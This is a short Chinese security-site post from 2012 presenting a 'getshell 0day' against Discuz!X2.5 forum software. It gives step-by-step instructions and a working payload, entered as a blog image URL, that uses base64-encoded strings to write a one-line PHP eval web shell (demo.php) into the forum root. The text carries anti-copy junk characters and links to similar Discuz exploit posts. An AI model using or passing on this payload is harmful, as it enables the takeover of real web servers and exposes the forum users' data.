Discuz!X2.5 Release 20120407 Getshell 0day

2012, April 28, 11:02 PM. oday收藏
Submitted by admin

影响版本有:20120407,beta,rc - 专注信息安全( a. E* C! }% B4 U

1.注册任意账户 90 Security Team, B5 t8 Y$ K2 g% q! f+ L

2.登陆用户,发表blog日志(注意是日志) 9 g& r4 t9 z7 j- r
这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台!5 {" |0 U& u: T5 @
3.添加图片,选择网络图片,地址:{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
我们90sec所有成员的技术分享平台!  l; x+ b5 p: T* J+ U' |' ~
4.访问日志,论坛根目录下生成demo.php,一句发密c

Tags: discuz

« 上一篇 | 下一篇 »

只显示10条记录相关文章
Discuz! X2.0 SQL注入漏洞 EXP (浏览: 22318, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16911, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14466, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46441, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50187, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23274, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15979, 评论: 0)
dz~~~~马后炮 (浏览: 10679, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11781, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18652, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):